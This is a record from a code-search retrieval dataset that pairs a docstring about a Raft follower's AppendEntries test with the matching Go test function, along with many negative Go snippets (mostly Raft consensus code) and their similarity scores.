newCommitIndex)\n\t\t\t\t\tr.stateManager.SetCommitIndex(newCommitIndex)\n\t\t\t\t}\n\n\t\t\t\tr.stateMutex.Unlock()\n\n\t\t\t\tlogger.Debugf(\"sending accept response\")\n\n\t\t\t\tresponseFunc(true, true)\n\t\t\tcase <-done:\n\t\t\t\tbreak processLoop\n\t\t\t}\n\t\t}\n\n\t\tclose(finishChannel)\n\t}()\n\n\treturn finishChannel\n}", "func (s *RaftServer) AppendEntry(_ context.Context, request *raftapi.AppendEntryRequest) (*raftapi.AppendEntryResponse, error) {\n\tlog.WithFields(s.LogFields()).Debugln(\"Received AppendEntry from\", request.Leader)\n\ts.lastHeartbeat = time.Now()\n\tterm := s.getTerm()\n\tif request.Term < term {\n\t\tlog.WithFields(s.LogFields()).Warnln(\"Term\", request.Term, \"Less than my term\", term)\n\t\treturn &raftapi.AppendEntryResponse{Term: term}, nil\n\t} else if request.Term >= term {\n\t\ts.role = Follower\n\t\tif err := s.setTerm(request.Term); err != nil {\n\t\t\tlog.WithFields(s.LogFields()).Errorln(\"Unable to update my term\")\n\t\t\treturn nil, model.NewRaftError(&s.member, err)\n\t\t}\n\t}\n\ts.leaderID = request.Leader\n\tsize, _ := s.logRepo.LogSize()\n\tread, _ := s.logRepo.Read(request.PrevLogId)\n\tif request.PrevLogId == -1 || uint64(request.PrevLogId) <= size && read.Term == request.PrevLogTerm {\n\t\tif size > 0 {\n\t\t\t_ = s.logRepo.TruncateToEntryNo(request.PrevLogId)\n\t\t}\n\t\tif request.Entry != nil {\n\t\t\t_, _ = s.logRepo.Create(request.Entry.Term, request.Entry.Value)\n\t\t}\n\t\treturn &raftapi.AppendEntryResponse{Term: term, Success: true}, nil\n\t}\n\treturn &raftapi.AppendEntryResponse{Term: term}, nil\n}", "func (r *Raft) sendAppend(to uint64) bool {\n\tr.sendAppendEntries(to)\n\treturn true\n}", "func (r *Raft) runFollower() {\n\tfor {\n\t\tselect {\n\t\tcase rpc := <-r.rpcCh:\n\t\t\t// Handle the command\n\t\t\tswitch cmd := rpc.Command.(type) {\n\t\t\tcase *AppendEntriesRequest:\n\t\t\t\tr.appendEntries(rpc, cmd)\n\t\t\tcase *RequestVoteRequest:\n\t\t\t\tr.requestVote(rpc, cmd)\n\t\t\tdefault:\n\t\t\t\tr.logE.Printf(\"In follower state, got unexpected command: %#v\", rpc.Command)\n\t\t\t\trpc.Respond(nil, fmt.Errorf(\"unexpected command\"))\n\t\t\t}\n\t\tcase a := <-r.applyCh:\n\t\t\t// Reject any operations since we are not the leader\n\t\t\ta.response = ErrNotLeader\n\t\t\ta.Response()\n\t\tcase <-randomTimeout(r.conf.HeartbeatTimeout, r.conf.ElectionTimeout):\n\t\t\t// Heartbeat failed! Go to the candidate state\n\t\t\tr.logW.Printf(\"Heartbeat timeout, start election process\")\n\t\t\tr.setState(Candidate)\n\t\t\treturn\n\n\t\tcase <-r.shutdownCh:\n\t\t\treturn\n\t\t}\n\t}\n}", "func ApproveFollower(w http.ResponseWriter, r *http.Request) {\n\tif !requirePOST(w, r) {\n\t\treturn\n\t}\n\n\ttype approveFollowerRequest struct {\n\t\tActorIRI string `json:\"actorIRI\"`\n\t\tApproved bool `json:\"approved\"`\n\t}\n\n\tdecoder := json.NewDecoder(r.Body)\n\tvar approval approveFollowerRequest\n\tif err := decoder.Decode(&approval); err != nil {\n\t\tcontrollers.WriteSimpleResponse(w, false, \"unable to handle follower state with provided values\")\n\t\treturn\n\t}\n\n\tif approval.Approved {\n\t\t// Approve a follower\n\t\tif err := persistence.ApprovePreviousFollowRequest(approval.ActorIRI); err != nil {\n\t\t\tcontrollers.WriteSimpleResponse(w, false, err.Error())\n\t\t\treturn\n\t\t}\n\n\t\tlocalAccountName := data.GetDefaultFederationUsername()\n\n\t\tfollowRequest, err := persistence.GetFollower(approval.ActorIRI)\n\t\tif err != nil {\n\t\t\tcontrollers.WriteSimpleResponse(w, false, err.Error())\n\t\t\treturn\n\t\t}\n\n\t\t// Send the approval to the follow requestor.\n\t\tif err := requests.SendFollowAccept(followRequest.Inbox, followRequest.RequestObject, localAccountName); err != nil {\n\t\t\tcontrollers.WriteSimpleResponse(w, false, err.Error())\n\t\t\treturn\n\t\t}\n\t} else {\n\t\t// Remove/block a follower\n\t\tif err := persistence.BlockOrRejectFollower(approval.ActorIRI); err != nil {\n\t\t\tcontrollers.WriteSimpleResponse(w, false, err.Error())\n\t\t\treturn\n\t\t}\n\t}\n\n\tcontrollers.WriteSimpleResponse(w, true, \"follower updated\")\n}", "func (m *MsgPing) Follower(interfaces.IState) bool {\n\treturn true\n}", "func CheckFollowing(write http.ResponseWriter, request *http.Request) {\n\tID := request.URL.Query().Get(\"id\")\n\n\tvar object models.UsersFollowers\n\tobject.UserID = IDUser\n\tobject.FollowerID = ID\n\n\tvar response ResponseConsultUserFollower\n\n\tstatus, err := bd.CheckFollowing(object)\n\tif err != nil || status == false {\n\t\tlog.Fatal(err.Error())\n\t\tresponse.Status = false\n\t} else {\n\t\tresponse.Status = true\n\t}\n\n\twrite.Header().Set(\"Content-Type\", \"application/json\")\n\twrite.WriteHeader(http.StatusCreated)\n\tjson.NewEncoder(write).Encode(response)\n}", "func (rf *Raft) Start(command interface{}) (int, int, bool) {\n\tindex := -1\n\tterm := -1\n\tisLeader := true\n\n\t// Your code here (2B).\n\tif rf.state == Leader {\n\t\tnewLogEntry := LogEntry{}\n\t\trf.mu.Lock()\n\t\tif rf.state == Leader {\n\t\t\tterm = rf.currentTerm\n\t\t\tnewLogEntry.Term = term\n\t\t\tnewLogEntry.Command = command\n\t\t\trf.log = append(rf.log, newLogEntry)\n\t\t\tindex = len(rf.log) - 1\n\t\t\t// update leader's matchIndex and nextIndex\n\t\t\trf.matchIndex[rf.me] = index\n\t\t\trf.nextIndex[rf.me] = index + 1\n\t\t\trf.persist()\n\t\t} else {\n\t\t\tDPrintf(\"Peer-%d, before lock, the state has changed to %d.\\n\", rf.me, rf.state)\n\t\t}\n\t\tif term != -1 {\n\t\t\tDPrintf(\"Peer-%d start to append %v to peers.\\n\", rf.me, command)\n\t\t\trequest := rf.createAppendEntriesRequest(index, index+1, term)\n\t\t\tappendProcess := func(server int) bool {\n\t\t\t\treply := new(AppendEntriesReply)\n\t\t\t\trf.sendAppendEntries(server, request, reply)\n\t\t\t\tok := rf.processAppendEntriesReply(index+1, reply)\n\t\t\t\tif ok {\n\t\t\t\t\tDPrintf(\"Peer-%d append log=%v to peer-%d successfully.\\n\", rf.me, request.Entries, server)\n\t\t\t\t} else {\n\t\t\t\t\tDPrintf(\"Peer-%d append log=%v to peer-%d failed.\\n\", rf.me, request.Entries, server)\n\t\t\t\t}\n\t\t\t\treturn ok\n\t\t\t}\n\t\t\tgo func() {\n\t\t\t\tok := rf.agreeWithServers(appendProcess)\n\t\t\t\tif ok {\n\t\t\t\t\t// if append successfully, update commit index.\n\t\t\t\t\trf.mu.Lock()\n\t\t\t\t\tif index >= rf.commitIndex {\n\t\t\t\t\t\tDPrintf(\"Peer-%d set commit=%d, origin=%d.\", rf.me, index, rf.commitIndex)\n\t\t\t\t\t\trf.commitIndex = index\n\t\t\t\t\t} else {\n\t\t\t\t\t\tDPrintf(\"Peer-%d get a currentIndex=%d < commitIndex=%d, it can not be happend.\", rf.me, index, rf.commitIndex)\n\t\t\t\t\t}\n\t\t\t\t\trf.mu.Unlock()\n\t\t\t\t} else {\n\t\t\t\t\tDPrintf(\"Peer-%d start agreement with servers failed. currentIndex=%d.\\n\", rf.me, index)\n\t\t\t\t}\n\t\t\t}()\n\t\t}\n\t\trf.mu.Unlock()\n\t} else {\n\t\tisLeader = false\n\t}\n\treturn index, term, isLeader\n}", "func (handler *RuleHandler) FollowerOnRemoveServer(msg iface.MsgRemoveServer, log iface.RaftLog, status iface.Status) []interface{} {\n\t// leader should be responsible for this\n\treturn []interface{}{iface.ReplyNotLeader{}}\n}", "func TestLeaderBcastBeat(t *testing.T) {\n\t// heartbeat interval\n\thi := 1\n\tr := newTestRaft(1, []uint64{1, 2, 3}, 10, hi, NewMemoryStorage())\n\tdefer closeAndFreeRaft(r)\n\tr.becomeCandidate()\n\tr.becomeLeader()\n\tfor i := 0; i < 10; i++ {\n\t\tr.appendEntry(pb.Entry{Index: uint64(i) + 1})\n\t}\n\n\tfor i := 0; i < hi; i++ {\n\t\tr.tick()\n\t}\n\n\tmsgs := r.readMessages()\n\tsort.Sort(messageSlice(msgs))\n\twmsgs := []pb.Message{\n\t\t{From: 1, FromGroup: pb.Group{NodeId: 1, GroupId: 1, RaftReplicaId: 1},\n\t\t\tTo: 2, ToGroup: pb.Group{NodeId: 2, GroupId: 1, RaftReplicaId: 2},\n\t\t\tTerm: 1, Type: pb.MsgHeartbeat},\n\t\t{From: 1, FromGroup: pb.Group{NodeId: 1, GroupId: 1, RaftReplicaId: 1},\n\t\t\tTo: 3, ToGroup: pb.Group{NodeId: 3, GroupId: 1, RaftReplicaId: 3},\n\t\t\tTerm: 1, Type: pb.MsgHeartbeat},\n\t}\n\tif !reflect.DeepEqual(msgs, wmsgs) {\n\t\tt.Errorf(\"msgs = %v, want %v\", msgs, wmsgs)\n\t}\n}", "func (r *Raft) leader() int {\n\t//fmt.Println(\"In leader(), I am: \", r.Myconfig.Id)\n\n\tr.sendAppendEntriesRPC() //send Heartbeats\n\t//waitTime := 4 //duration between two heartbeats\n\twaitTime := 1\n\twaitTime_secs := secs * time.Duration(waitTime)\n\t//fmt.Println(\"Heartbeat time out is\", waitTime)\n\n\twaitTimeAE := 5 //max time to wait for AE_Response\n\tHeartbeatTimer := r.StartTimer(HeartbeatTimeout, waitTime) //starts the timer and places timeout object on the channel\n\t//var AppendEntriesTimer *time.Timer\n\twaitStepDown := 7\n\tRetryTimer := r.StartTimer(RetryTimeOut, waitStepDown)\n\t//fmt.Println(\"I am\", r.Myconfig.Id, \"timer created\", AppendEntriesTimer)\n\tresponseCount := 0\n\tfor {\n\n\t\treq := r.receive() //wait for client append req,extract the msg received on self eventCh\n\t\tswitch req.(type) {\n\t\tcase ClientAppendReq:\n\t\t\t//reset the heartbeat timer, now this sendRPC will maintain the authority of the leader\n\t\t\tHeartbeatTimer.Reset(waitTime_secs)\n\t\t\trequest := req.(ClientAppendReq)\n\t\t\tdata := request.data\n\t\t\t//fmt.Println(\"Received CA request,cmd is: \", string(data))\n\t\t\t//No check for semantics of cmd before appending to log?\n\t\t\tr.AppendToLog_Leader(data) //append to self log as byte array\n\t\t\tr.sendAppendEntriesRPC()\n\t\t\tresponseCount = 0 //for RetryTimer\n\t\t\t//AppendEntriesTimer = r.StartTimer(AppendEntriesTimeOut, waitTimeAE) //Can be written in HeartBeatTimer too\n\t\t\t//fmt.Println(\"I am\", r.Myconfig.Id, \"Timer assigned a value\", AppendEntriesTimer)\n\t\tcase AppendEntriesResponse:\n\t\t\tresponse := req.(AppendEntriesResponse)\n\t\t\t//fmt.Println(\"got AE_Response! from : \", response.followerId, response)\n\t\t\tresponseCount += 1\n\t\t\tif responseCount >= majority {\n\t\t\t\twaitTime_retry := secs * time.Duration(waitStepDown)\n\t\t\t\tRetryTimer.Reset(waitTime_retry)\n\t\t\t}\n\t\t\t//when isHeartBeat is true then success is also true according to the code in serviceAEReq so case wont be there when isHB is true and success is false\n\t\t\t// isHB true means it is a succeeded heartbeat hence no work to do if it is AE req then only proceed else do nothing and continue\n\t\t\t//So when follower's log is stale or he is more latest, it would set isHB false\n\t\t\tif !response.isHeartBeat {\n\t\t\t\tretVal := r.serviceAppendEntriesResp(response, HeartbeatTimer, waitTimeAE, waitTime)\n\t\t\t\tif retVal == follower {\n\t\t\t\t\treturn follower\n\t\t\t\t}\n\n\t\t\t}\n\n\t\tcase AppendEntriesReq: // in case some other leader is also in function, it must fall back or remain leader\n\t\t\trequest := req.(AppendEntriesReq)\n\t\t\tif request.term > r.currentTerm {\n\t\t\t\t//fmt.Println(\"In leader,AE_Req case, I am \", r.Myconfig.Id, \"becoming follower now, because request.term, r.currentTerm\", request.term, r.currentTerm)\n\t\t\t\tr.currentTerm = request.term //update self term and step down\n\t\t\t\tr.votedFor = -1 //since term has increased so votedFor must be reset to reflect for this term\n\t\t\t\tr.WriteCVToDisk()\n\t\t\t\treturn follower //sender server is the latest leader, become follower\n\t\t\t} else {\n\t\t\t\t//reject the request sending false\n\t\t\t\treply := AppendEntriesResponse{r.currentTerm, false, r.Myconfig.Id, false, r.myMetaData.lastLogIndex}\n\t\t\t\tsend(request.leaderId, reply)\n\t\t\t}\n\n\t\tcase int: //Time out-time to send Heartbeats!\n\t\t\ttimeout := req.(int)\n\t\t\tif timeout == RetryTimeOut {\n\t\t\t\tRetryTimer.Stop()\n\t\t\t\treturn follower\n\t\t\t}\n\t\t\t//fmt.Println(\"Timeout of\", r.Myconfig.Id, \"is of type:\", timeout)\n\n\t\t\t//waitTime_secs := secs * time.Duration(waitTime)\n\t\t\tif timeout == HeartbeatTimeout {\n\t\t\t\t//fmt.Println(\"Leader:Reseting HB timer\")\n\t\t\t\tHeartbeatTimer.Reset(waitTime_secs)\n\t\t\t\tresponseCount = 0 //since new heartbeat is now being sent\n\t\t\t\t//it depends on nextIndex which is correctly read in prepAE_Req method,\n\t\t\t\t//since it was AE other than HB(last entry), it would have already modified the nextIndex map\n\t\t\t\tr.sendAppendEntriesRPC() //This either sends Heartbeats or retries the failed AE due to which the timeout happened,\n\t\t\t\t//HeartbeatTimer.Reset(secs * time.Duration(8)) //for checking leader change, setting timer of f4 to 8s--DOESN'T work..-_CHECK\n\t\t\t}\n\n\t\t}\n\t}\n}", "func (r *RaftNode) mergeLogEntries(req *AppendEntriesRequest) (success bool) {\n\n\tr.leaderMutex.Lock()\n\tdefer r.leaderMutex.Unlock()\n\n\tentries := req.GetEntries()\n\n\t// if prevLogIndex is out of range, cannot merge\n\tif req.GetPrevLogIndex() < 0 || req.GetPrevLogIndex() > r.getLastLogIndex() {\n\t\tr.Out(\"MERGING: Couldn't find prev\")\n\t\treturn false\n\t}\n\n\t// if log doesn't contain entry at prevLogIndex with term PrevLogTerm, cannot merge\n\tfollowerPrevLog := r.getLogEntry(req.GetPrevLogIndex())\n\tif followerPrevLog.TermId != req.GetPrevLogTerm() {\n\t\tr.Out(\"MERGING: Couldn't find prevEntry with term = %d; index = %d\", req.GetPrevLogTerm(), req.GetPrevLogIndex())\n\t\treturn false\n\t}\n\n\t// if there are entries present, merge them\n\tif entries != nil && len(entries) != 0 {\n\t\tfor i := range entries {\n\t\t\t// index of where we would insert the new item\n\t\t\tinsertAt := uint64(i) + req.GetPrevLogIndex() + 1\n\t\t\tif entries[i].GetIndex() != insertAt {\n\t\t\t\tr.Error(\"Request doesn't have correct index!! State corrupted.\")\n\t\t\t}\n\t\t\tr.Out(\"Merging logs: adding %v\", entries[i])\n\t\t\tif insertAt <= r.getLastLogIndex() {\n\t\t\t\tr.truncateLog(insertAt)\n\t\t\t\tr.appendLogEntry(*entries[i])\n\t\t\t} else {\n\t\t\t\t// if we go past the end of the log (or remove entries above), keep appending\n\t\t\t\tr.appendLogEntry(*entries[i])\n\t\t\t}\n\t\t}\n\t}\n\n\t// apply all logEntries up until leader's commitIndex to statemachine\n\tif req.GetLeaderCommit() > r.commitIndex {\n\t\tnewCommitIndex := min(req.GetLeaderCommit(), r.getLastLogIndex())\n\t\t// start at +1 since commitIndex has already been committed\n\t\tfor i := r.commitIndex + 1; i <= newCommitIndex; i++ {\n\t\t\tentry := r.getLogEntry(i)\n\t\t\tr.Out(\"COMMITTING index=%v;term=%v\", entry.GetIndex(), entry.GetTermId())\n\t\t\tif entry.Type == CommandType_STATE_MACHINE_COMMAND {\n\t\t\t\tresponse, err := r.stateMachine.ApplyCommand(entry.Command, entry.Data)\n\t\t\t\tif err != nil {\n\t\t\t\t\tr.Error(\"State machine error: %v (response: %s)\", err, response)\n\t\t\t\t}\n\t\t\t}\n\t\t\tr.lastApplied = i\n\t\t}\n\t\tr.commitIndex = newCommitIndex\n\t}\n\n\tr.Verbose(\"Merge successful\")\n\treturn true\n}", "func (mr *MockEventLoggerMockRecorder) AppendCheck(assumedVersion, event interface{}) *gomock.Call {\n\tmr.mock.ctrl.T.Helper()\n\treturn mr.mock.ctrl.RecordCallWithMethodType(mr.mock, \"AppendCheck\", reflect.TypeOf((*MockEventLogger)(nil).AppendCheck), assumedVersion, event)\n}", "func UpdateFollowers(\n\tctx context.Context,\n\tfollowTarget string,\n\trdb *redis.Client,\n\thelixCl *helix.Client,\n) {\n\tconst batchSize = 100\n\tfmt.Println(\"Update of followers started.\")\n\tdefer fmt.Println(\"Update of followers finished.\")\n\n\t// update the followers set\n\tcursor := \"\"\n\tfor {\n\t\tresp, err := helixCl.GetUsersFollows(&helix.UsersFollowsParams{\n\t\t\tAfter: cursor,\n\t\t\tFirst: batchSize,\n\t\t\tToID: followTarget,\n\t\t})\n\t\tif err != nil {\n\t\t\tlog.Printf(\"Error getting followers\")\n\t\t\tcontinue\n\t\t}\n\n\t\tfor _, f := range resp.Data.Follows {\n\t\t\tj, err := json.Marshal(f)\n\t\t\tif err != nil {\n\t\t\t\tlog.Printf(\"Could not marshal follows data for user %s\", f.FromName)\n\t\t\t\tcontinue\n\t\t\t}\n\n\t\t\tif err := rdb.HMSet(ctx, f.FromID, j).Err(); err != nil {\n\t\t\t\tlog.Printf(\"Error adding follower '%s' to DB (%s)\", f.FromName, err)\n\t\t\t\tcontinue\n\t\t\t}\n\t\t}\n\n\t\t// bail out if we are on the last page, since we're getting\n\t\t// batches of 100 each loop iteration\n\t\tif len(resp.Data.Follows) < batchSize {\n\t\t\tbreak\n\t\t}\n\t\tcursor = resp.Data.Pagination.Cursor\n\t}\n\n\t// update the users set to mark new followers as followers\n\tallUsers, err := rdb.HVals(ctx, \"users\").Result()\n\tif err != nil {\n\t\tlog.Printf(\"Couldn't get list of users from DB (%s)\", err)\n\t\treturn\n\t}\n\n\tfor _, userStr := range allUsers {\n\t\tvar u user.User\n\t\terr := json.Unmarshal([]byte(userStr), &u)\n\t\tif err != nil {\n\t\t\tlog.Printf(\"Couldn't unmarshal user (%s)\", err)\n\t\t\tcontinue\n\t\t}\n\t\t// Check Followers bucket to see if this id exists\n\t\tfollower, err := isFollower(ctx, rdb, u.ID)\n\t\tif err != nil {\n\t\t\tlog.Printf(\"Couldn't figure out if user %s is a follower\", u.ID)\n\t\t\tcontinue\n\t\t}\n\t\tu.IsFollower = follower\n\t\tif err := saveUser(ctx, rdb, &u); err != nil {\n\t\t\tlog.Printf(\"Couldn't save user %v (%s)\", u, err)\n\t\t\tcontinue\n\t\t}\n\t}\n}", "func (r *Raft) sendAppendRpc(value ServerConfig,appendEntry *AppendRPCArgs, AppendAck_ch chan int,isSync bool) {\n\t//not to send the append entries rpc to the leader itself \n\tclient, err := rpc.Dial(\"tcp\", \"localhost:\"+strconv.Itoa(value.LogPort))\n\t//fmt.Println(\"Hostname \",value.Hostname)\n\t//fmt.Println(\"Sending Append RPCs to:\",value.Hostname+\":\"+strconv.Itoa(value.LogPort))\n\n\t if err != nil {\n\t\tlog.Print(\"Error Dialing :\", err)\n\t\tAppendAck_ch <- 0\n\t\treturn\n\t }\n\n\t//defer value.Client.Close() //TODO\n\t defer client.Close()\n\t//this reply is the ack from the followers receiving the append entries\n\tvar reply AppendRPCReply\n\n\terr1 := client.Call(\"RPC.AppendRPC\", appendEntry, &reply)\n\n\tif err1 != nil {\n\t\tlog.Print(\"Remote Method Invocation Error:Append RPC:\", err)\n\t}\n\t\n\t//fmt.Println(\"RPC reply from:\",value.Hostname+\":\"+strconv.Itoa(value.LogPort)+\" is \",reply.Reply)\n\tif reply.NextIndex!=-1 {\n\t\t\n\t\tr.NextIndex[value.Id]=reply.NextIndex\t\n\t}\t\n\tif reply.MatchIndex!=-1 {\n\t\tr.MatchIndex[value.Id]=reply.MatchIndex\n\t}\t\n\tif reply.Reply {\n\t\t AppendAck_ch <- value.Id\n\t}else {\n\t\tAppendAck_ch <-\t-1\n\t}\n}", "func (r *Raft) prepAppendEntriesReq() (appendEntriesReqArray [noOfServers]AppendEntriesReq) {\n\tfor i := 0; i < noOfServers; i++ {\n\t\tif i != r.Myconfig.Id {\n\t\t\tnextIndex := r.myMetaData.nextIndexMap[i] //read the nextIndex to be sent from map\n\t\t\tleaderId := r.LeaderConfig.Id\n\t\t\tvar entries []byte\n\t\t\tvar term, prevLogIndex, prevLogTerm int\n\n\t\t\t//if len(r.myLog) != 0 { //removed since, in case of decrementing nextIndexes for log repair, log length is never zero but nextIndex becomes -1\n\t\t\tif nextIndex >= 0 { //this is AE request with last entry sent (this will be considered as HB when log of follower is consistent)\n\t\t\t\t//fmt.Println(\"Next index is\", nextIndex, \"for server\", i)\n\t\t\t\tterm = r.myLog[nextIndex].Term\n\t\t\t\tentries = r.myLog[nextIndex].Cmd //entry to be replicated\n\t\t\t\tprevLogIndex = nextIndex - 1 //should be changed to nextIndex-1\n\t\t\t\tif nextIndex == 0 {\n\t\t\t\t\tprevLogTerm = -1 //since indexing will be log[-1] so it must be set explicitly\n\t\t\t\t} else {\n\t\t\t\t\tprevLogTerm = r.myLog[prevLogIndex].Term //this is the way to get new prevLogTerm to be sent\n\t\t\t\t}\n\n\t\t\t} else { //so this is prepReq for heartbeat for empty as nextIndex is -1\n\t\t\t\t//when log is empty indexing to log shouldn't be done hence copy old values\n\t\t\t\tterm = r.currentTerm\n\t\t\t\tentries = nil\n\t\t\t\tprevLogIndex = r.myMetaData.prevLogIndex\n\t\t\t\tprevLogTerm = r.myMetaData.prevLogTerm\n\t\t\t}\n\n\t\t\tleaderCommitIndex := r.myMetaData.commitIndex\n\t\t\tleaderLastLogIndex := r.myMetaData.lastLogIndex\n\t\t\tappendEntriesObj := AppendEntriesReq{term, leaderId, prevLogIndex, prevLogTerm, entries, leaderCommitIndex, leaderLastLogIndex}\n\t\t\tappendEntriesReqArray[i] = appendEntriesObj\n\t\t}\n\n\t}\n\treturn appendEntriesReqArray\n\n}", "func follow(e *event) {\n\tfMap, ok := followers[e.to]\n\tif !ok {\n\t\tfMap = make(map[int]int)\n\t}\n\tfMap[e.from] = e.from\n\tfollowers[e.to] = fMap\n\tif h, ok := clients.Get(e.to); ok {\n\t\th.Write(e)\n\t}\n}", "func TestHandleHeartbeat(t *testing.T) {\n\tcommit := uint64(2)\n\ttests := []struct {\n\t\tm pb.Message\n\t\twCommit uint64\n\t}{\n\t\t{pb.Message{From: 2, To: 1, Type: pb.MsgHeartbeat, Term: 2, Commit: commit + 1}, commit + 1},\n\t\t{pb.Message{From: 2, To: 1, Type: pb.MsgHeartbeat, Term: 2, Commit: commit - 1}, commit}, // do not decrease commit\n\t}\n\n\tfor i, tt := range tests {\n\t\tstorage := NewMemoryStorage()\n\t\tdefer storage.Close()\n\t\tstorage.Append([]pb.Entry{{Index: 1, Term: 1}, {Index: 2, Term: 2}, {Index: 3, Term: 3}})\n\t\tsm := newTestRaft(1, []uint64{1, 2}, 5, 1, storage)\n\t\tsm.becomeFollower(2, 2)\n\t\tsm.raftLog.commitTo(commit)\n\t\tsm.handleHeartbeat(tt.m)\n\t\tif sm.raftLog.committed != tt.wCommit {\n\t\t\tt.Errorf(\"#%d: committed = %d, want %d\", i, sm.raftLog.committed, tt.wCommit)\n\t\t}\n\t\tm := sm.readMessages()\n\t\tif len(m) != 1 {\n\t\t\tt.Fatalf(\"#%d: msg = nil, want 1\", i)\n\t\t}\n\t\tif m[0].Type != pb.MsgHeartbeatResp {\n\t\t\tt.Errorf(\"#%d: type = %v, want MsgHeartbeatResp\", i, m[0].Type)\n\t\t}\n\t}\n}", "func isFollowup(subj string) bool {\n\tfor _, prefix := range _BAD_PREFIXES {\n\t\tif strings.HasPrefix(strings.ToLower(subj), prefix) {\n\t\t\treturn true\n\t\t}\n\t}\n\n\treturn false\n}", "func (s ReplicaServer) AppendEntry(ctx context.Context, req *proto.AppendEntryReq) (*proto.AppendEntryResp, error) {\n\ts.R.mu.Lock()\n\tdefer s.R.mu.Unlock()\n\n\tif req.Term >= s.R.term {\n\t\ts.R.term = req.Term\n\t\ts.R.lastPinged = time.Now()\n\t\ts.R.setLeader(req.Id)\n\t\ts.R.lastCommit = req.LastCommit\n\t\ts.R.execute()\n\n\t\t// Check if preceding entry exists first, unless first entry\n\t\tif req.PreIndex == -1 || (req.PreIndex < int64(len(s.R.log)) && s.R.log[req.PreIndex].Term == req.PreTerm) {\n\t\t\t// Append entries to log\n\t\t\tentries := req.Entries\n\n\t\t\tif len(entries) == 0 {\n\t\t\t\t// Replica up to date\n\t\t\t\treturn &proto.AppendEntryResp{Ok: true}, nil\n\t\t\t}\n\n\t\t\tsort.Slice(entries, func(i, j int) bool { return entries[i].Index < entries[j].Index })\n\n\t\t\tnumNeed := entries[len(entries)-1].Index + 1 - int64(len(s.R.log))\n\t\t\tif numNeed > 0 {\n\t\t\t\ts.R.log = append(s.R.log, make([]*proto.Entry, numNeed)...)\n\t\t\t}\n\t\t\tfor _, e := range entries {\n\t\t\t\ts.R.log[e.Index] = e\n\t\t\t}\n\n\t\t\treturn &proto.AppendEntryResp{Ok: true}, nil\n\t\t}\n\t}\n\treturn &proto.AppendEntryResp{Ok: false}, nil\n}", "func (rf *Raft) sendAllAppendEntriesOrInstallSnapshot() {\n\tAssertF(rf.commitIndex >= rf.snapshotIndex,\n\t\t\"rf.commitIndex {%d} >= rf.snapshotIndex {%d}\",\n\t\trf.commitIndex, rf.snapshotIndex)\n\n\tif rf.status != Leader {\n\t\treturn\n\t}\n\n\tfor i := range rf.peers {\n\t\tif i != rf.me {\n\t\t\trf.sendOneAppendEntriesOrInstallSnapshot(i)\n\t\t}\n\t}\n}" ]
[ "0.68868625", "0.67104995", "0.60897493", "0.607411", "0.59460866", "0.5896438", "0.5842949", "0.58197165", "0.57796806", "0.57522064", "0.5702428", "0.56857294", "0.56728303", "0.56607705", "0.5658912", "0.5633639", "0.56321836", "0.5629746", "0.56050974", "0.5597355", "0.55620354", "0.5560116", "0.5537587", "0.55264014", "0.5518465", "0.55169064", "0.551643", "0.5483981", "0.5483747", "0.5481212", "0.54341036", "0.54295605", "0.53959155", "0.53752136", "0.534744", "0.5340959", "0.53355163", "0.5333665", "0.5323454", "0.53205025", "0.5318798", "0.5289999", "0.5289811", "0.5285744", "0.5285744", "0.52711195", "0.5267591", "0.52590525", "0.52452195", "0.51904553", "0.5151353", "0.51153946", "0.50812113", "0.50770634", "0.5072045", "0.50591624", "0.5045246", "0.5026267", "0.50171244", "0.5004217", "0.4982041", "0.49773246", "0.49660164", "0.4962995", "0.49619463", "0.49432045", "0.49359462", "0.4907422", "0.4899151", "0.48820132", "0.4876934", "0.48737165", "0.48579606", "0.48337188", "0.4791232", "0.47420192", "0.47170055", "0.47010025", "0.46968377", "0.4695533", "0.46673727", "0.46567464", "0.462415", "0.45891663", "0.45863703", "0.45832196", "0.45775124", "0.4568409", "0.4560051", "0.4557094", "0.45542338", "0.454731", "0.45392987", "0.4530263", "0.45279267", "0.45122087", "0.44848698", "0.44783467", "0.44741532", "0.44659206" ]
0.8075628
0
TestFollowerAppendEntries tests that when AppendEntries RPC is valid, the follower will delete the existing conflict entry and all that follow it, and append any new entries not already in the log. Also, it writes the new entry into stable storage. Reference: section 5.3
func TestFollowerAppendEntries(t *testing.T) { tests := []struct { index, term uint64 ents []pb.Entry wents []pb.Entry wunstable []pb.Entry }{ { 2, 2, []pb.Entry{{Term: 3, Index: 3}}, []pb.Entry{{Term: 1, Index: 1}, {Term: 2, Index: 2}, {Term: 3, Index: 3}}, []pb.Entry{{Term: 3, Index: 3}}, }, { 1, 1, []pb.Entry{{Term: 3, Index: 2}, {Term: 4, Index: 3}}, []pb.Entry{{Term: 1, Index: 1}, {Term: 3, Index: 2}, {Term: 4, Index: 3}}, []pb.Entry{{Term: 3, Index: 2}, {Term: 4, Index: 3}}, }, { 0, 0, []pb.Entry{{Term: 1, Index: 1}}, []pb.Entry{{Term: 1, Index: 1}, {Term: 2, Index: 2}}, nil, }, { 0, 0, []pb.Entry{{Term: 3, Index: 1}}, []pb.Entry{{Term: 3, Index: 1}}, []pb.Entry{{Term: 3, Index: 1}}, }, } for i, tt := range tests { storage := NewMemoryStorage() storage.Append([]pb.Entry{{Term: 1, Index: 1}, {Term: 2, Index: 2}}) r := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, storage) defer closeAndFreeRaft(r) r.becomeFollower(2, 2) r.Step(pb.Message{From: 2, To: 1, Type: pb.MsgApp, Term: 2, LogTerm: tt.term, Index: tt.index, Entries: tt.ents}) if g := r.raftLog.allEntries(); !reflect.DeepEqual(g, tt.wents) { t.Errorf("#%d: ents = %+v, want %+v", i, g, tt.wents) } if g := r.raftLog.unstableEntries(); !reflect.DeepEqual(g, tt.wunstable) { t.Errorf("#%d: unstableEnts = %+v, want %+v", i, g, tt.wunstable) } } }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
